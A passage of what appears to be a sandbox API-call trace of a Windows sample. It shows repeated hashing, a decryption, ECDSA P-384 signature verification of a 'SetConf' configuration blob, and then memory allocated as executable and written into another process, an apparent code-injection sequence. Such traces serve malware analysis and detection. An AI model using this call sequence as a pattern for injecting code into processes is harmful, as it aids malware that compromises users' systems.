returned 1 [0190.369] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x33822ed0) returned 1 [0190.369] CryptCreateHash (in: hProv=0x33822ed0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.369] CryptHashData (hHash=0x3396f120, pbData=0x32349170, dwDataLen=0xa40, dwFlags=0x0) returned 1 [0190.370] CryptDestroyHash (hHash=0x3396f120) returned 1 [0190.370] CryptReleaseContext (hProv=0x33822ed0, dwFlags=0x0) returned 1 [0190.370] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x338222d0) returned 1 [0190.370] CryptCreateHash (in: hProv=0x338222d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.370] CryptHashData (hHash=0x3396ea20, pbData=0x32349170, dwDataLen=0xa60, dwFlags=0x0) returned 1 [0190.370] CryptDestroyHash (hHash=0x3396ea20) returned 1 [0190.370] CryptReleaseContext (hProv=0x338222d0, dwFlags=0x0) returned 1 [0190.370] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x338225d0) returned 1 [0190.371] CryptCreateHash (in: hProv=0x338225d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.371] CryptHashData (hHash=0x3396f350, pbData=0x32349170, dwDataLen=0xa80, dwFlags=0x0) returned 1 [0190.371] CryptDestroyHash (hHash=0x3396f350) returned 1 [0190.371] CryptReleaseContext (hProv=0x338225d0, dwFlags=0x0) returned 1 [0190.371] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x33821fd0) returned 1 [0190.371] CryptCreateHash (in: hProv=0x33821fd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.371] CryptHashData (hHash=0x3396f580, pbData=0x32349170, dwDataLen=0xaa0, dwFlags=0x0) returned 1 [0190.371] CryptDestroyHash (hHash=0x3396f580) returned 1 [0190.371] CryptReleaseContext (hProv=0x33821fd0, dwFlags=0x0) returned 1 [0190.371] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x338236d0) returned 1 [0190.372] CryptCreateHash (in: hProv=0x338236d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.372] CryptHashData (hHash=0x3396eb00, pbData=0x32349170, dwDataLen=0xac0, dwFlags=0x0) returned 1 [0190.372] CryptDestroyHash (hHash=0x3396eb00) returned 1 [0190.372] CryptReleaseContext (hProv=0x338236d0, dwFlags=0x0) returned 1 [0190.372] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x33821fd0) returned 1 [0190.373] CryptCreateHash (in: hProv=0x33821fd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.373] CryptHashData (hHash=0x3396f120, pbData=0x32349170, dwDataLen=0xae0, dwFlags=0x0) returned 1 [0190.373] CryptDestroyHash (hHash=0x3396f120) returned 1 [0190.373] CryptReleaseContext (hProv=0x33821fd0, dwFlags=0x0) returned 1 [0190.373] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x33822cd0) returned 1 [0190.373] CryptCreateHash (in: hProv=0x33822cd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.373] CryptHashData (hHash=0x3396f820, pbData=0x32349170, dwDataLen=0xb00, dwFlags=0x0) returned 1 [0190.373] CryptDestroyHash (hHash=0x3396f820) returned 1 [0190.373] CryptReleaseContext (hProv=0x33822cd0, dwFlags=0x0) returned 1 [0190.373] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x338221d0) returned 1 [0190.374] CryptCreateHash (in: hProv=0x338221d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.374] CryptHashData (hHash=0x3396f350, pbData=0x32349170, dwDataLen=0xb20, dwFlags=0x0) returned 1 [0190.374] CryptDestroyHash (hHash=0x3396f350) returned 1 [0190.374] CryptReleaseContext (hProv=0x338221d0, dwFlags=0x0) returned 1 [0190.374] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x338225d0) returned 1 [0190.375] CryptCreateHash (in: hProv=0x338225d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.375] CryptHashData (hHash=0x3396ea90, pbData=0x32349170, dwDataLen=0xb40, dwFlags=0x0) returned 1 [0190.375] CryptDestroyHash (hHash=0x3396ea90) returned 1 [0190.375] CryptReleaseContext (hProv=0x338225d0, dwFlags=0x0) returned 1 [0190.375] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x338230d0) returned 1 [0190.375] CryptCreateHash (in: hProv=0x338230d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.375] CryptHashData (hHash=0x3396eda0, pbData=0x32349170, dwDataLen=0xb60, dwFlags=0x0) returned 1 [0190.375] CryptDestroyHash (hHash=0x3396eda0) returned 1 [0190.375] CryptReleaseContext (hProv=0x338230d0, dwFlags=0x0) returned 1 [0190.375] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x338236d0) returned 1 [0190.376] CryptCreateHash (in: hProv=0x338236d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.376] CryptHashData (hHash=0x3396ed30, pbData=0x32349170, dwDataLen=0xb80, dwFlags=0x0) returned 1 [0190.376] CryptDestroyHash (hHash=0x3396ed30) returned 1 [0190.376] CryptReleaseContext (hProv=0x338236d0, dwFlags=0x0) returned 1 [0190.376] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x33821dd0) returned 1 [0190.376] CryptCreateHash (in: hProv=0x33821dd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.376] CryptHashData (hHash=0x3396f3c0, pbData=0x32349170, dwDataLen=0xba0, dwFlags=0x0) returned 1 [0190.376] CryptDestroyHash (hHash=0x3396f3c0) returned 1 [0190.376] CryptReleaseContext (hProv=0x33821dd0, dwFlags=0x0) returned 1 [0190.376] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x338221d0) returned 1 [0190.377] CryptCreateHash (in: hProv=0x338221d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.378] CryptHashData (hHash=0x3396ef60, pbData=0x32349170, dwDataLen=0xbc0, dwFlags=0x0) returned 1 [0190.378] CryptDestroyHash (hHash=0x3396ef60) returned 1 [0190.378] CryptReleaseContext (hProv=0x338221d0, dwFlags=0x0) returned 1 [0190.378] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x33822cd0) returned 1 [0190.378] CryptCreateHash (in: hProv=0x33822cd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.378] CryptHashData (hHash=0x3396ed30, pbData=0x32349170, dwDataLen=0xbe0, dwFlags=0x0) returned 1 [0190.378] CryptDestroyHash (hHash=0x3396ed30) returned 1 [0190.379] CryptReleaseContext (hProv=0x33822cd0, dwFlags=0x0) returned 1 [0190.379] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x338233d0) returned 1 [0190.379] CryptCreateHash (in: hProv=0x338233d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.379] CryptHashData (hHash=0x3396f120, pbData=0x32349170, dwDataLen=0xc00, dwFlags=0x0) returned 1 [0190.379] CryptDestroyHash (hHash=0x3396f120) returned 1 [0190.379] CryptReleaseContext (hProv=0x338233d0, dwFlags=0x0) returned 1 [0190.379] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x338239d0) returned 1 [0190.380] CryptCreateHash (in: hProv=0x338239d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.380] CryptHashData (hHash=0x3396ea90, pbData=0x32349170, dwDataLen=0xc20, dwFlags=0x0) returned 1 [0190.380] CryptDestroyHash (hHash=0x3396ea90) returned 1 [0190.380] CryptReleaseContext (hProv=0x338239d0, dwFlags=0x0) returned 1 [0190.380] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x338239d0) returned 1 [0190.380] CryptCreateHash (in: hProv=0x338239d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.380] CryptHashData (hHash=0x3396eb00, pbData=0x32349170, dwDataLen=0xc40, dwFlags=0x0) returned 1 [0190.380] CryptDestroyHash (hHash=0x3396eb00) returned 1 [0190.380] CryptReleaseContext (hProv=0x338239d0, dwFlags=0x0) returned 1 [0190.380] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x33822dd0) returned 1 [0190.381] CryptCreateHash (in: hProv=0x33822dd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.381] CryptHashData (hHash=0x3396f580, pbData=0x32349170, dwDataLen=0xc60, dwFlags=0x0) returned 1 [0190.381] CryptDestroyHash (hHash=0x3396f580) returned 1 [0190.381] CryptReleaseContext (hProv=0x33822dd0, dwFlags=0x0) returned 1 [0190.381] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x338228d0) returned 1 [0190.382] CryptCreateHash (in: hProv=0x338228d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.382] CryptHashData (hHash=0x3396eb70, pbData=0x32349170, dwDataLen=0xc80, dwFlags=0x0) returned 1 [0190.382] CryptDestroyHash (hHash=0x3396eb70) returned 1 [0190.382] CryptReleaseContext (hProv=0x338228d0, dwFlags=0x0) returned 1 [0190.382] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x33822ad0) returned 1 [0190.382] CryptCreateHash (in: hProv=0x33822ad0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.382] CryptHashData (hHash=0x3396f200, pbData=0x32349170, dwDataLen=0xca0, dwFlags=0x0) returned 1 [0190.382] CryptDestroyHash (hHash=0x3396f200) returned 1 [0190.382] CryptReleaseContext (hProv=0x33822ad0, dwFlags=0x0) returned 1 [0190.382] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x33822ad0) returned 1 [0190.383] CryptCreateHash (in: hProv=0x33822ad0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.383] CryptHashData (hHash=0x3396ed30, pbData=0x32349170, dwDataLen=0xcc0, dwFlags=0x0) returned 1 [0190.383] CryptDestroyHash (hHash=0x3396ed30) returned 1 [0190.383] CryptReleaseContext (hProv=0x33822ad0, dwFlags=0x0) returned 1 [0190.383] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x338229d0) returned 1 [0190.383] CryptCreateHash (in: hProv=0x338229d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.384] CryptHashData (hHash=0x3396ea20, pbData=0x32349170, dwDataLen=0xce0, dwFlags=0x0) returned 1 [0190.384] CryptDestroyHash (hHash=0x3396ea20) returned 1 [0190.384] CryptReleaseContext (hProv=0x338229d0, dwFlags=0x0) returned 1 [0190.384] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x338231d0) returned 1 [0190.384] CryptCreateHash (in: hProv=0x338231d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.384] CryptHashData (hHash=0x3396ef60, pbData=0x32349170, dwDataLen=0xd00, dwFlags=0x0) returned 1 [0190.384] CryptDestroyHash (hHash=0x3396ef60) returned 1 [0190.384] CryptReleaseContext (hProv=0x338231d0, dwFlags=0x0) returned 1 [0190.384] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x33822cd0) returned 1 [0190.385] CryptCreateHash (in: hProv=0x33822cd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.385] CryptHashData (hHash=0x3396ea20, pbData=0x32349170, dwDataLen=0xd20, dwFlags=0x0) returned 1 [0190.385] CryptDestroyHash (hHash=0x3396ea20) returned 1 [0190.385] CryptReleaseContext (hProv=0x33822cd0, dwFlags=0x0) returned 1 [0190.385] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x33822cd0) returned 1 [0190.385] CryptCreateHash (in: hProv=0x33822cd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.385] CryptHashData (hHash=0x3396ea90, pbData=0x32349170, dwDataLen=0xd40, dwFlags=0x0) returned 1 [0190.385] CryptDestroyHash (hHash=0x3396ea90) returned 1 [0190.385] CryptReleaseContext (hProv=0x33822cd0, dwFlags=0x0) returned 1 [0190.386] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x33823bd0) returned 1 [0190.386] CryptCreateHash (in: hProv=0x33823bd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.386] CryptHashData (hHash=0x3396ed30, pbData=0x32349170, dwDataLen=0xd60, dwFlags=0x0) returned 1 [0190.386] CryptDestroyHash (hHash=0x3396ed30) returned 1 [0190.386] CryptReleaseContext (hProv=0x33823bd0, dwFlags=0x0) returned 1 [0190.386] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x33822bd0) returned 1 [0190.387] CryptCreateHash (in: hProv=0x33822bd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.387] CryptHashData (hHash=0x3396f350, pbData=0x32349170, dwDataLen=0xd80, dwFlags=0x0) returned 1 [0190.387] CryptDestroyHash (hHash=0x3396f350) returned 1 [0190.387] CryptReleaseContext (hProv=0x33822bd0, dwFlags=0x0) returned 1 [0190.387] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x338227d0) returned 1 [0190.389] CryptCreateHash (in: hProv=0x338227d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.389] CryptHashData (hHash=0x3396ed30, pbData=0x32349170, dwDataLen=0xda0, dwFlags=0x0) returned 1 [0190.389] CryptDestroyHash (hHash=0x3396ed30) returned 1 [0190.389] CryptReleaseContext (hProv=0x338227d0, dwFlags=0x0) returned 1 [0190.389] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x338232d0) returned 1 [0190.390] CryptCreateHash (in: hProv=0x338232d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.390] CryptHashData (hHash=0x3396f190, pbData=0x32349170, dwDataLen=0xdc0, dwFlags=0x0) returned 1 [0190.390] CryptDestroyHash (hHash=0x3396f190) returned 1 [0190.390] CryptReleaseContext (hProv=0x338232d0, dwFlags=0x0) returned 1 [0190.390] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x33822ed0) returned 1 [0190.391] CryptCreateHash (in: hProv=0x33822ed0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.391] CryptHashData (hHash=0x3396ed30, pbData=0x32349170, dwDataLen=0xde0, dwFlags=0x0) returned 1 [0190.391] CryptDestroyHash (hHash=0x3396ed30) returned 1 [0190.391] CryptReleaseContext (hProv=0x33822ed0, dwFlags=0x0) returned 1 [0190.391] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x338221d0) returned 1 [0190.391] CryptCreateHash (in: hProv=0x338221d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.391] CryptHashData (hHash=0x3396f120, pbData=0x32349170, dwDataLen=0xe00, dwFlags=0x0) returned 1 [0190.391] CryptDestroyHash (hHash=0x3396f120) returned 1 [0190.391] CryptReleaseContext (hProv=0x338221d0, dwFlags=0x0) returned 1 [0190.391] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x338225d0) returned 1 [0190.392] CryptCreateHash (in: hProv=0x338225d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.392] CryptHashData (hHash=0x3396f660, pbData=0x32349170, dwDataLen=0xe20, dwFlags=0x0) returned 1 [0190.392] CryptDestroyHash (hHash=0x3396f660) returned 1 [0190.392] CryptReleaseContext (hProv=0x338225d0, dwFlags=0x0) returned 1 [0190.392] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x33822dd0) returned 1 [0190.393] CryptCreateHash (in: hProv=0x33822dd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.393] CryptHashData (hHash=0x3396efd0, pbData=0x32349170, dwDataLen=0xe40, dwFlags=0x0) returned 1 [0190.393] CryptDestroyHash (hHash=0x3396efd0) returned 1 [0190.393] CryptReleaseContext (hProv=0x33822dd0, dwFlags=0x0) returned 1 [0190.393] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x338236d0) returned 1 [0190.394] CryptCreateHash (in: hProv=0x338236d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.394] CryptHashData (hHash=0x3396f580, pbData=0x32349170, dwDataLen=0xe60, dwFlags=0x0) returned 1 [0190.394] CryptDestroyHash (hHash=0x3396f580) returned 1 [0190.394] CryptReleaseContext (hProv=0x338236d0, dwFlags=0x0) returned 1 [0190.394] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x338235d0) returned 1 [0190.395] CryptCreateHash (in: hProv=0x338235d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.395] CryptHashData (hHash=0x3396eef0, pbData=0x32349170, dwDataLen=0xe80, dwFlags=0x0) returned 1 [0190.395] CryptDestroyHash (hHash=0x3396eef0) returned 1 [0190.395] CryptReleaseContext (hProv=0x338235d0, dwFlags=0x0) returned 1 [0190.395] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x33821fd0) returned 1 [0190.396] CryptCreateHash (in: hProv=0x33821fd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.396] CryptHashData (hHash=0x3396ed30, pbData=0x32349170, dwDataLen=0xea0, dwFlags=0x0) returned 1 [0190.396] CryptDestroyHash (hHash=0x3396ed30) returned 1 [0190.396] CryptReleaseContext (hProv=0x33821fd0, dwFlags=0x0) returned 1 [0190.396] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x338221d0) returned 1 [0190.396] CryptCreateHash (in: hProv=0x338221d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.396] CryptHashData (hHash=0x3396f350, pbData=0x32349170, dwDataLen=0xec0, dwFlags=0x0) returned 1 [0190.397] CryptDestroyHash (hHash=0x3396f350) returned 1 [0190.397] CryptReleaseContext (hProv=0x338221d0, dwFlags=0x0) returned 1 [0190.397] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x338231d0) returned 1 [0190.397] CryptCreateHash (in: hProv=0x338231d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.397] CryptHashData (hHash=0x3396ed30, pbData=0x32349170, dwDataLen=0xee0, dwFlags=0x0) returned 1 [0190.397] CryptDestroyHash (hHash=0x3396ed30) returned 1 [0190.397] CryptReleaseContext (hProv=0x338231d0, dwFlags=0x0) returned 1 [0190.397] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x33822dd0) returned 1 [0190.398] CryptCreateHash (in: hProv=0x33822dd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.398] CryptHashData (hHash=0x3396eb00, pbData=0x32349170, dwDataLen=0xf00, dwFlags=0x0) returned 1 [0190.398] CryptDestroyHash (hHash=0x3396eb00) returned 1 [0190.398] CryptReleaseContext (hProv=0x33822dd0, dwFlags=0x0) returned 1 [0190.398] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x338230d0) returned 1 [0190.398] CryptCreateHash (in: hProv=0x338230d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.398] CryptHashData (hHash=0x3396f820, pbData=0x32349170, dwDataLen=0xf20, dwFlags=0x0) returned 1 [0190.399] CryptDestroyHash (hHash=0x3396f820) returned 1 [0190.399] CryptReleaseContext (hProv=0x338230d0, dwFlags=0x0) returned 1 [0190.401] CryptSetKeyParam (hKey=0x3396f580, dwParam=0x4, pbData=0xce114*=0x1, dwFlags=0x0) returned 1 [0190.401] CryptSetKeyParam (hKey=0x3396f580, dwParam=0x1, pbData=0x32ad2a20, dwFlags=0x0) returned 1 [0190.401] CryptDecrypt (in: hKey=0x3396f580, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32e806f0, pdwDataLen=0xce0fc | out: pbData=0x32e806f0, pdwDataLen=0xce0fc) returned 1 [0190.401] CryptReleaseContext (hProv=0x338222d0, dwFlags=0x0) returned 1 [0190.401] CryptDestroyKey (hKey=0x3396f580) returned 0 [0190.401] GetVersion () returned 0x295a000a [0190.401] BCryptOpenAlgorithmProvider (in: phAlgorithm=0xce068, pszAlgId="ECDSA_P384", pszImplementation=0x0, dwFlags=0x0 | out: phAlgorithm=0xce068) returned 0x0 [0190.402] BCryptImportKeyPair (in: hAlgorithm=0x33356920, hImportKey=0x0, pszBlobType="ECCPUBLICBLOB", phKey=0xce060, pbInput=0x32e40d90, cbInput=0x68, dwFlags=0x0 | out: phKey=0xce060) returned 0x0 [0190.402] BCryptGetProperty (in: hObject=0x337b15b0, pszProperty="SignatureLength", pbOutput=0xce05c, cbOutput=0x4, pcbResult=0xce07c, dwFlags=0x0 | out: pbOutput=0xce05c, pcbResult=0xce07c) returned 0x0 [0190.402] BCryptVerifySignature (hKey=0x337b15b0, pPaddingInfo=0x0, pbHash=0x32e64af0, cbHash=0x30, pbSignature=0x32e808fc, cbSignature=0x60, dwFlags=0x0) returned 0x0 [0190.403] BCryptDestroyKey (in: hKey=0x337b15b0 | out: hKey=0x337b15b0) returned 0x0 [0190.403] BCryptCloseAlgorithmProvider (in: hAlgorithm=0x33356920, dwFlags=0x0 | out: hAlgorithm=0x33356920) returned 0x0 [0190.403] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64af0 | out: hHeap=0x2150000) returned 1 [0190.403] lstrlenA (lpString="SetConf") returned 7 [0190.403] VirtualAllocEx (hProcess=0x730, lpAddress=0x0, dwSize=0x8, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0190.403] WriteProcessMemory (in: hProcess=0x730, lpBaseAddress=0x1e0000, lpBuffer=0x32e80bd0*, nSize=0x8, lpNumberOfBytesWritten=0xcdba8 | out: lpBuffer=0x32e80bd0*, lpNumberOfBytesWritten=0xcdba8*=0x8) returned 1 [0190.404] VirtualAllocEx (hProcess=0x730, lpAddress=0x0, dwSize=0x204, flAllocationType=0x3000, flProtect=0x40) returned 0x4c0000 [0190.404] WriteProcessMemory (in: hProcess=0x730, lpBaseAddress=0x4c0000, lpBuffer=0x32803c00*, nSize=0x204, lpNumberOfBytesWritten=0xcdba8 | out: lpBuffer=0x32803c00*, lpNumberOfBytesWritten=0xcdba8*=0x204) returned 1 [0190.404] VirtualAllocEx (hProcess=0x730, lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x40) returned 0x4d0000 [0190.405] WriteProcessMemory (in: hProcess=0x730, lpBaseAddress=0x4d0000, lpBuffer=0xcde20*, nSize=0x400, lpNumberOfBytesWritten=0xcdba8 | out: lpBuffer=0xcde20*, lpNumberOfBytesWritten=0xcdba8*=0x400) returned 1 [0190.405] VirtualAllocEx (hProcess=0x730, lpAddress=0x0, dwSize=0x80, flAllocationType=0x3000, flProtect=0x40) returned 0x4e0000 [0190.405] WriteProcessMemory (in: hProcess=0x730, lpBaseAddress=0x4e0000, lpBuffer=0xcdda0*, nSize=0x80, lpNumberOfBytesWritten=0xcdba8 | out: lpBuffer=0xcdda0*, lpNumberOfBytesWritten=0xcdba8*=0x80) returned 1 [0190.406] VirtualAllocEx (hProcess=0x730, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0x4f0000 [0190.406] ReadProcessMemory (in: hProcess=0x730, lpBaseAddress=0x110000, lpBuffer=0xcdb00, nSize=0xd8, lpNumberOfBytesRead=0xcdab8 | out: lpBuffer=0xcdb00*, lpNumberOfBytesRead=0xcdab8*=0xd8) returned 1 [0190.406] VirtualAllocEx (hProcess=0x730, lpAddress=0x0, dwSize=0x58, flAllocationType=0x3000, flProtect=0x40) returned 0x500000 [0190.406] WriteProcessMemory (in: hProcess=0x730, 